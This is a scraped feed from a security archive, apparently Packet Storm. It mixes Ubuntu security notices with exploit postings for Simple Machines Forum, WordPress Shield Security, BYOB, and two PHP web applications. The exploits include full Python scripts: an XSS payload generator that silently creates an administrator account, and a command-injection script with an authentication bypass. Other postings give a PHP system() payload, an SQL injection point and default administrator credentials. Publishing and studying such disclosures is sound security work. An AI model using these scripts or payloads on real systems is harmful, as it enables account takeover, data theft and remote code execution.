Simple Machines Forum version 2.1.4 suffers from an authenticated code injection vulnerability.

    # Exploit Title:  Authenticated Code Injection - smfv2.1.4# Date: 8/2024# Exploit Author: Andrey Stoykov# Version: 2.1.4# Tested on: Ubuntu 22.04# Blog:https://msecureltd.blogspot.com/2024/06/friday-fun-pentest-series-7-smfv214.htmlCode Injection Authenticated:Steps to Reproduce:1. Login as admin2. Browse to "Current Theme"3. Click on "Modify Themes" > "SMF Default Theme"4. Click on Admin.template.php5. In the first box enter the PHP payload "<?php system('cat /etc/passwd')?>"// HTTP POST request showing the code injection payloadPOST /SMFdbwci7dy0o/index.php?action=admin;area=theme;th=1;sa=edit HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7[...]entire_file[]=<?php+system('cat /etc/passwd') ?>[...]// HTTP response showing /etc/passwd contentsHTTP/1.1 200 OKServer: ApachePragma: no-cache[...][...]root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin[...]

Simple Machines Forum 2.1.4 Code Injection

Ubuntu Security Notice 6966-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. It was discovered that Firefox did not properly manage certain memory operations when processing graphics shared memory. An attacker could potentially exploit this issue to escape the sandbox.

    ==========================================================================Ubuntu Security Notice USN-6966-1August 19, 2024firefox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user weretricked into opening a specially crafted website, an attacker couldpotentially exploit these to cause a denial of service, obtain sensitiveinformation across domains, or execute arbitrary code. (CVE-2024-7518,CVE-2024-7521, CVE-2024-7524, CVE-2024-7526, CVE-2024-7527, CVE-2024-7528,CVE-2024-7529, CVE-2024-7530, CVE-2024-7531)It was discovered that Firefox did not properly manage certain memoryoperations when processing graphics shared memory. An attacker couldpotentially exploit this issue to escape the sandbox. (CVE-2024-7519)Nan Wang discovered that Firefox did not properly handle type check inWebAssembly. An attacker could potentially exploit this issue to executearbitrary code. (CVE-2024-7520)Irvan Kurniawan discovered that Firefox did not properly check an attributevalue in the editor component, leading to an out-of-bounds readvulnerability. An attacker could possibly use this issue to cause a denialof service or expose sensitive information. (CVE-2024-7522)Rob Wu discovered that Firefox did not properly check permissions whencreating a StreamFilter. An attacker could possibly use this issue tomodify response body of requests on any site using a web extension.(CVE-2024-7525)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  firefox                         129.0.1+build1-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changesReferences:  https://ubuntu.com/security/notices/USN-6966-1  CVE-2024-7518, CVE-2024-7519, CVE-2024-7520, CVE-2024-7521,  CVE-2024-7522, CVE-2024-7524, CVE-2024-7525, CVE-2024-7526,  CVE-2024-7527, CVE-2024-7528, CVE-2024-7529, CVE-2024-7530,  CVE-2024-7531Package Information:  https://launchpad.net/ubuntu/+source/firefox/129.0.1+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6966-1

Ubuntu Security Notice 6837-2 - It was discovered that Rack incorrectly parsed certain media types. A remote attacker could possibly use this issue to cause Rack to consume resources, leading to a denial of service. This issue only affected Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. It was discovered that Rack incorrectly handled certain Range headers. A remote attacker could possibly use this issue to cause Rack to create large responses, leading to a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6837-2  
August 19, 2024

ruby-rack vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS  
- Ubuntu 14.04 LTS

Summary:

Several security issues were fixed in Rack.

Software Description:  
- ruby-rack: modular Ruby webserver interface

Details:

It was discovered that Rack incorrectly parsed certain media types. A  
remote attacker could possibly use this issue to cause Rack to consume  
resources, leading to a denial of service. This issue only affected  
Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. (CVE-2024-25126)

It was discovered that Rack incorrectly handled certain Range headers. A  
remote attacker could possibly use this issue to cause Rack to create  
large responses, leading to a denial of service. (CVE-2024-26141)

It was discovered that Rack incorrectly handled certain crafted headers. A  
remote attacker could possibly use this issue to cause Rack to consume  
resources, leading to a denial of service. (CVE-2024-26146)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS  
   ruby-rack                       2.1.4-5ubuntu1+  5  
                                   Available with Ubuntu Pro

Ubuntu 20.04 LTS  
   ruby-rack                       2.0.7-2ubuntu0.1+esm5  
                                   Available with Ubuntu Pro

Ubuntu 18.04 LTS  
   ruby-rack                       1.6.4-4ubuntu0.2+esm6  
                                   Available with Ubuntu Pro

Ubuntu 16.04 LTS  
   ruby-rack                       1.6.4-3ubuntu0.2+esm6  
                                   Available with Ubuntu Pro

Ubuntu 14.04 LTS  
   ruby-rack                       1.5.2-3+deb8u3ubuntu1~esm8  
                                   Available with Ubuntu Pro

After a standard system update you need to restart any applications using  
Rack to make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6837-2  
   https://ubuntu.com/security/notices/USN-6837-1  
   CVE-2024-25126, CVE-2024-26141, CVE-2024-26146

Ubuntu Security Notice USN-6837-2

Jobs Finder System version 1.0 suffers from a remote SQL injection vulnerability.

**Jobs Finder System 1.0 SQL Injection**

Posted Aug 19, 2024

Authored by indoushka

Jobs Finder System version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | 0e14944aabacd3bde55dc9ca768a85b25224b5d197aed3ef9cecb63e14d97575

Download | Favorite | View

**Jobs Finder System 1.0 SQL Injection**

    =============================================================================================================================================| # Title     : jobs Finder System v1.0 SQL injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Jobs_Finder_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /jobs.php?id=3 <=== inject here[+] http://127.0.0.1/jobportal-master/jobs.php?id=3 [+]  Login : http://127.0.0.1/jobportal-master/login.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,460)
*   Arbitrary (16,885)
*   BBS (2,859)
*   Bypass (1,867)
*   CGI (1,033)
*   Code Execution (7,823)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,398)
*   DoS (25,094)
*   Encryption (2,389)
*   Exploit (53,232)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (898)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,727)
*   Python (1,646)
*   Remote (31,673)
*   Root (3,638)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,029)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,614)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,004)
*   Web (9,968)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,101)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,815)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,569)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,756)
*   UNIX (9,438)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Jobs Finder System 1.0 SQL Injection

Human Resource Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

**Human Resource Management System 2024 1.0 Insecure Settings**

Posted Aug 19, 2024

Authored by indoushka

Human Resource Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | bf20205d0167adcb0c48749ed7a50372cba24a18938ecfb734926b5099542af1

Download | Favorite | View

**Human Resource Management System 2024 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Human Resource Management System 2024 v1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = admin#123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,460)
*   Arbitrary (16,885)
*   BBS (2,859)
*   Bypass (1,867)
*   CGI (1,033)
*   Code Execution (7,823)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,398)
*   DoS (25,094)
*   Encryption (2,389)
*   Exploit (53,232)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (898)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,727)
*   Python (1,646)
*   Remote (31,673)
*   Root (3,638)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,029)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,614)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,004)
*   Web (9,968)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,101)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,815)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,569)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,756)
*   UNIX (9,438)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Human Resource Management System 2024 1.0 Insecure Settings

Bhojon Restaurant Management System version 3.0 suffers from an ignored default credential vulnerability.

**Bhojon Restaurant Management System 3.0 Insecure Settings**

Posted Aug 19, 2024

Authored by indoushka

Bhojon Restaurant Management System version 3.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 5040244ae54e0b0c8ba29ab2d3b854826d64f8640404907653ffda5ea3f38ca6

Download | Favorite | View

**Bhojon Restaurant Management System 3.0 Insecure Settings**

    ====================================================================================================================================| # Title     : Bhojon restaurant management system v3.0 Insecure Settings Vulnerability                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.bdtask.com/restaurant-management-system.php#live_demo                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@example.com & pass = 12345[+] https://www/127.0.0.1/gixrestaurantmy/dashboard/autoupdateGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,460)
*   Arbitrary (16,885)
*   BBS (2,859)
*   Bypass (1,867)
*   CGI (1,033)
*   Code Execution (7,823)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,398)
*   DoS (25,094)
*   Encryption (2,389)
*   Exploit (53,232)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (898)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,727)
*   Python (1,646)
*   Remote (31,673)
*   Root (3,638)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,029)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,614)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,004)
*   Web (9,968)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,101)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,815)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,569)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,756)
*   UNIX (9,438)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Bhojon Restaurant Management System 3.0 Insecure Settings

Ubuntu Security Notice 6964-1 - Noriko Totsuka discovered that ORC incorrectly handled certain crafted file. An attacker could possibly use this issue to execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6964-1  
August 15, 2024

orc vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

ORC could be made to crash or execute arbitrary code

Software Description:  
- orc: Library of Optimized Inner Loops Runtime Compiler

Details:

Noriko Totsuka discovered that ORC incorrectly handled certain  
crafted file. An attacker could possibly use this issue to execute  
arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  liborc-0.4-0t64                 1:0.4.38-1ubuntu0.1

Ubuntu 22.04 LTS  
  liborc-0.4-0                    1:0.4.32-2ubuntu0.1

Ubuntu 20.04 LTS  
  liborc-0.4-0                    1:0.4.31-1ubuntu0.1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6964-1  
  CVE-2024-40897

Package Information:  
  https://launchpad.net/ubuntu/+source/orc/1:0.4.38-1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/orc/1:0.4.32-2ubuntu0.1  
  https://launchpad.net/ubuntu/+source/orc/1:0.4.31-1ubuntu0.1

Ubuntu Security Notice USN-6964-1

WordPress Shield Security plugin versions 20.0.5 and below cross site scripting exploit that adds an administrative user.

# Exploit Title: CVE-2024-7313 - Reflected XSS to Unauthorised Administrator Account Creation  
# Google Dork: inurl:"/wp-content/plugins/wp-simple-firewall/" (Cannot find version numbers from this DORK)  
# Date: 16/08/2024  
# Exploit Author: Tim Lepp  
# Vendor Homepage: https://getshieldsecurity.com/  
# Software Link: https://wordpress.org/plugins/wp-simple-firewall/advanced/ (Version <= 20.0.5)  
# Version: <20.0.6  
# Tested on: Ubuntu  
# CVE : CVE-2024-7313

How It Works

  *   The script first checks if the target WordPress installation is using a vulnerable version of the Shield Security plugin by examining the response from the wp-login.php page.  
  *   If the plugin version is vulnerable, it proceeds to generate a reflected XSS payload that, when executed, will create a new admin user with a hardcoded password as WordPress wont accept weak passwords without user intervention.  
  *   The payload is created to first use a GET request to dynamically find the WordPress nonce used for account creation, then use that nonce to submit a POST request to the user creation endpoint with the details of the new user given in the script.  
  *  
The payload is then URL-encoded and displayed for use in the attack.  
  *  
Once sent to an administrator of the site and the link is clicked, a new Administrator user will be created on the site with the details parsed by the script. This is all done in the background, with the phished administrator being redirected to the Shield Security dashboard with no clue of the exploit in the background.

Reference  
https://research.cleantalk.org/cve-2024-7313/

Found also at https://github.com/Wayne-Ker/CVE-2024-7313/tree/main

--- code ---

import sys  
import urllib.parse  
import requests  
from bs4 import BeautifulSoup

# Color codes for terminal output  
red = '\033[91m'  
green = '\033[92m'  
yellow = '\033[93m'  
blue = '\033[96m'  
purple = '\033[95m'  
reset = '\033[0m'

# Banner and vulnerability information - Displayed at the start of the script  
def print_banner():  
    print(f"""{red}  
#############################################################################  
#                                                                           #  
#                                                                           #  
#   ______     _______     ____   ___ ____  _  _       _____ _____ _ _____  #  
#  / ___\ \   / | ____|   |___ \ / _ |___ \| || |     |___  |___ // |___ /  #  
# | |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ / /  |_ \| | |_ \  #  
# | |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____/ /  ___) | |___) | #  
#  \____|  \_/  |_____|   |_____|\___|_____|  |_|      /_/  |____/|_|____/  #  
#                                                                           #  
#    Shield Security Plugin Vulnerability (CVE-2024-7313)                   #  
#    Reflected XSS in WordPress Shield Security Plugin                      #  
#    Versions Affected: < 20.0.6                                            #  
#    Risk: High                                                             #  
#    Discovered by: Wayne-Kerr                                              #  
#    Published: August 7, 2024                                              #  
#############################################################################   
    {reset}""")

# Help menu - Provides instructions when '-h' or '--help' is used  
def print_help():  
    print(f"""{yellow}  
Usage: python3 exploit.py <target_url>

Example:  
    python3 exploit.py http://example.com

Options:  
    -h, --help    Show this help message and exit  
{reset}""")

# Format the target URL - Ensures the URL starts with "http://" or "https://"  
def format_target_url(target_url):  
    if target_url.startswith("http://") or target_url.startswith("https://"):  
        return target_url  
    else:  
        return f"http://{target_url}"

# Check if the target is vulnerable by accessing the wp-login.php page  
def check_vulnerability(target_url):  
    try:  
        response = requests.get(f"{target_url}/wp-login.php")  
        if response.status_code == 200:  
            # Try to extract version information from the response  
            version_info = response.text.split("ver=")[-1].split("\"")[0]  
            version = version_info.split(".")  
            major_version = int(version[0])  
            minor_version = int(version[1])  
            patch_version = int(version[2].split('&')[0])

            # Check if the version is below 20.0.6  
            if major_version < 20 or (major_version == 20 and minor_version == 0 and patch_version < 6):  
                print(f"{green}Shield Security version is vulnerable. Let's continue.{reset}")  
                return True  
            else:  
                print(f"{yellow}Version not vulnerable.{reset}")  
                return False  
        else:  
            print(f"{red}Failed to retrieve the version information.{reset}")  
            return False  
    except Exception as e:  
        print(f"{red}Error occurred while checking vulnerability: {e}{reset}")  
        return False

# Generate the XSS payload URL that exploits the vulnerability  
def generate_xss_payload(target_url, username, email, first_name, last_name):  
    # Hardcoded password for the new admin account to be created  
    hardcoded_password = "HaxorStrongAFPassword123!!"

    # The payload template for the XSS attack  
    payload_template = (  
        "var xhrNonce = new XMLHttpRequest(); "  
        "xhrNonce.open('GET', '/wp-admin/user-new.php', true); "  
        "xhrNonce.onload = function() {{ "  
        "if (xhrNonce.status === 200) {{ "  
        "var nonce = xhrNonce.responseText.match(/name=\"_wpnonce_create-user\" value=\"([a-zA-Z0-9]+)\"/)[1]; "  
        "var xhr = new XMLHttpRequest(); "  
        "xhr.open('POST', '/wp-admin/user-new.php', true); "  
        "xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); "  
        "xhr.setRequestHeader('Referer', '{target}/wp-admin/user-new.php'); "  
        "xhr.setRequestHeader('Origin', '{target}'); "  
        "var params = 'action=createuser&_wpnonce_create-user=' + nonce + "  
        "'&_wp_http_referer=%2Fwp-admin%2Fuser-new.php"  
        "&user_login={username}&email={email}"  
        "&first_name={first_name}&last_name={last_name}&url=test"  
        "&pass1={password}&pass2={password}&role=administrator"  
        "&createuser=Add+New+User'; "  
        "xhr.send(params); "  
        "xhr.onload = function() {{ "  
        "if (xhr.status == 200) {{ "  
        "console.log('Admin user created successfully'); "  
        "window.location.href = '{target}/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub=overview'; "  
        "}} else {{ console.log('Error occurred: ' + xhr.statusText); }} "  
        "}}; "  
        "}} else {{ console.log('Error fetching nonce: ' + xhrNonce.statusText); }} }}; "  
        "xhrNonce.send();"  
    )

    # Formatting the payload with the provided details  
    payload = payload_template.format(  
        target=target_url,  
        username=username,  
        email=urllib.parse.quote(email),  
        first_name=first_name,  
        last_name=last_name,  
        password=urllib.parse.quote(hardcoded_password)  
    )

    # URL encode the payload and generate the full URL for the XSS attack  
    encoded_payload = urllib.parse.quote(f"<script>{payload}</script>")  
    full_url = f"{target_url}/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub={encoded_payload}"

    return full_url

if __name__ == "__main__":  
    try:  
        # Print the banner  
        print_banner()

        # Check for help menu flag and print help if necessary  
        if len(sys.argv) != 2 or sys.argv[1] in ['-h', '--help']:  
            print_help()  
            sys.exit(0)

        # Get the target URL from the command-line argument  
        raw_target_url = sys.argv[1]  
        target_url = format_target_url(raw_target_url)

        # Check if the target is vulnerable  
        if not check_vulnerability(target_url):  
            sys.exit(1)

        # Get user input for the new admin account details  
        username = input(f"{blue}Enter username: {reset}")  
        email = input(f"{blue}Enter email: {reset}")  
        first_name = input(f"{blue}Enter first name: {reset}")  
        last_name = input(f"{blue}Enter last name: {reset}")

        # Display the hardcoded password  
        hardcoded_password = "HaxorStrongAFPassword123!!"  
        print(f"\n{yellow}Using hardcoded password: {hardcoded_password}{reset}")

        # Generate and display the XSS payload URL  
        xss_payload_url = generate_xss_payload(target_url, username, email, first_name, last_name)  
        print(f"\n{green}Generated XSS Payload URL: {xss_payload_url}{reset}")

    # Handle keyboard interruption  
    except KeyboardInterrupt:  
        print(f"\n{red}Script interrupted by user.{reset}")  
        sys.exit(1)  
    # Catch any other exceptions and display an error message  
    except Exception as e:  
        print(f"{red}An error occurred: {e}{reset}")  
        sys.exit(1)

WordPress Shield Security 20.0.5 Cross Site Scripting

Ubuntu Security Notice 6963-1 - It was discovered that GNOME Shell incorrectly opened the portal helper automatically when detecting a captive network portal. A remote attacker could possibly use this issue to load arbitrary web pages containing JavaScript, leading to resource consumption or other attacks.

==========================================================================  
Ubuntu Security Notice USN-6963-1  
August 15, 2024

gnome-shell vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

GNOME Shell could allow unintended access to network services.

Software Description:  
- gnome-shell: graphical shell for the GNOME desktop

Details:

It was discovered that GNOME Shell incorrectly opened the portal helper  
automatically when detecting a captive network portal. A remote attacker  
could possibly use this issue to load arbitrary web pages containing  
JavaScript, leading to resource consumption or other attacks.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   gnome-shell                     46.0-0ubuntu6~24.04.3

Ubuntu 22.04 LTS  
   gnome-shell                     42.9-0ubuntu2.2

Ubuntu 20.04 LTS  
   gnome-shell                     3.36.9-0ubuntu0.20.04.4

After a standard system update you need to restart your session to make all  
the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6963-1  
   CVE-2024-36472

Package Information:  
   https://launchpad.net/ubuntu/+source/gnome-shell/46.0-0ubuntu6~24.04.3  
   https://launchpad.net/ubuntu/+source/gnome-shell/42.9-0ubuntu2.2  
   https://launchpad.net/ubuntu/+source/gnome-shell/3.36.9-0ubuntu0.20.04.4

Ubuntu Security Notice USN-6963-1

Build Your Own Botnet (BYOB) version 2.0.0 exploit that works by spoofing an agent callback to overwrite the sqlite database and bypass authentication and exploiting an authenticated command injection in the payload builder page.

    # Exploit Title: BYOB (Build Your Own Botnet) v2.0.0 Unauthenticated RCE (Remote Code Execution)# Date: 2024-08-14# Exploit Author: @_chebuya# Software Link: https://github.com/malwaredllc/byob# Version: v2.0.0# Tested on: Ubuntu 22.04 LTS, Python 3.10.12, change numpy==1.17.3->numpy# CVE: CVE-2024-?????, CVE-2024-?????# Description: This exploit works by spoofing an agent callback to overwrite the sqlite database and bypass authentication, then exploiting an authenticated command injection in the payload builder page# Github: # Blog: import sysimport jsonimport base64import stringimport randomimport argparseimport requestsfrom bs4 import BeautifulSoupdef get_csrf(session, url):    r = session.get(url)    soup = BeautifulSoup(r.text, 'html.parser')    csrf_token = soup.find('input', {'name': 'csrf_token'})['value']    return csrf_tokendef upload_database(session, url, filename):    with open('database.db', 'rb') as f:        bindata = f.read()    data = base64.b64encode(bindata).decode('ascii')    json_data = {'data': data, 'filename': filename, 'type': "txt", 'owner': "admin", "module": "icloud", "session": "lol"}    headers = {        'Content-Length': str(len(json.dumps(json_data)))    }    print("[***] Uploading database")    upload_response = session.post(f"{url}/api/file/add", data=json_data, headers=headers)    print(upload_response.status_code)    return upload_response.status_codedef exploit(url, username, password, user_agent, command):    s = requests.Session()    # This is to ensure reliability, as the application cwd might change depending on the stage of the docker run process    filepaths = ["/proc/self/cwd/buildyourownbotnet/database.db", "/proc/self/cwd/../buildyourownbotnet/database.db", "/proc/self/cwd/../../../../buildyourownbotnet/database.db", "/proc/self/cwd/instance/database.db", "/proc/self/cwd/../../../../instance/database.db", "/proc/self/cwd/../instance/database.db"]    failed = True    for filepath in filepaths:        if upload_database(s, url, filepath) != 500:            failed = False            break    if failed:        print("[!!!] Failed to upload database, exiting")        sys.exit(1)    if password is None:        password = ''.join([random.choice(string.ascii_uppercase + string.digits) for _ in range(32)])    print(username + ":" + password)    register_csrf = get_csrf(s, f'{url}/register')    headers = {        'User-Agent': user_agent,        'Content-Type': 'application/x-www-form-urlencoded',    }    data = {        'csrf_token': register_csrf,        'username': username,        'password': password,        'confirm_password': password,        'submit': 'Sign Up'    }    print("[***] Registering user   ")    regsiter_response = s.post(f'{url}/register', headers=headers, data=data)    print(regsiter_response.status_code)    login_csrf = get_csrf(s, f'{url}/login')    data = {        'csrf_token': login_csrf,        'username': username,        'password': password,        'submit': 'Log In'    }    print("[***] Logging in")    login_response = s.post(f'{url}/login', headers=headers, data=data)    print(login_response.status_code)    headers = {        'User-Agent': user_agent,        'Content-Type': 'application/x-www-form-urlencoded',    }    data = f'format=exe&operating_system=nix$({command})&architecture=amd64'    try:        s.post(f'{url}/api/payload/generate', headers=headers, data=data, stream=True, timeout=0.0000000000001)    except requests.exceptions.ReadTimeout:        passparser = argparse.ArgumentParser()parser.add_argument("-t", "--target", help="The target URL of the BYOB admin panel", required=True)parser.add_argument("-u", "--username", help="The username to set for the new admin account", default='admin')parser.add_argument("-p", "--password", help="The password to set for the new admin account", default=None)parser.add_argument("-A", "--user-agent", help="The user-agent to use for requests", default='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36')parser.add_argument("-c", "--command", help="The command to execute on the BYOB server", required=True)args = parser.parse_args()exploit(args.target.rstrip("/"), args.username, args.password, args.user_agent, args.command)

Tag

#ubuntu